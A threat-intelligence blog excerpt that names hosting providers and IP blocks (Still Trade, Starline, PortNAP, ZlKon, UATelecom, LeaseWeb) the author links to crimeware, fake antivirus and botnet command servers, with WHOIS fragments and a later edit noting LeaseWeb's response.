Andrew Martin

The absolute worst culprit that I’ve come across so far in terms of bad IPs is Still Trade LTD from Russia. They have their own /24, AS47486. Out of 34 web servers in their IP block, 30 are bad. Spamhaus has the block blacklisted as a source of crimeware, see their report here.
person: [...]

Next up, we have Starline Web Services, based in Estonia. Starline was recently in the news for briefly hosting a Srizbi C&C as reported by Fireeye.
inetnum: 92.62.101.0 – 92.62.101.255
netname: STARLINE_EE
descr: Starline Web [...]

One of the smaller hosts I’ve identified is PortNAP Internet Services. They appear to get their service from Grafix Internet B.V. We’ve seen fake anti virus coming from 3 of their IPs in two different /24 subnets registered to PortNAP 84.243.196.0 – 84.243.197.255.

inetnum: 84.243.197.0 – 84.243.197.255
netname: [...]

After a weekend hiatus, I’m back with the next host of interest – ZlKon.
role: ZlKon HostMaster
address: Lilijas iela 4-74
address: Riga, LV-1055
address: Latvija
phone: [...]

The next source of badness I’ll cover is UATelecom (AS44997). With a /22, this host is much smaller than LeaseWeb. A Swiss blogger also had a run in with this host which you can read about here (written in German)
91.203.92.0/22
AS44997
netname: BASTION-NET
descr: [...]

**Edit 2**
I’d like to thank LeaseWeb for taking the time to respond to this post. It’s great to hear that they take action quickly once informed of abuse. I found it surprising that they would receive reports of malware and other nefarious activity but with no substantiating evidence. The “fire and forget” mentality of notifying [...]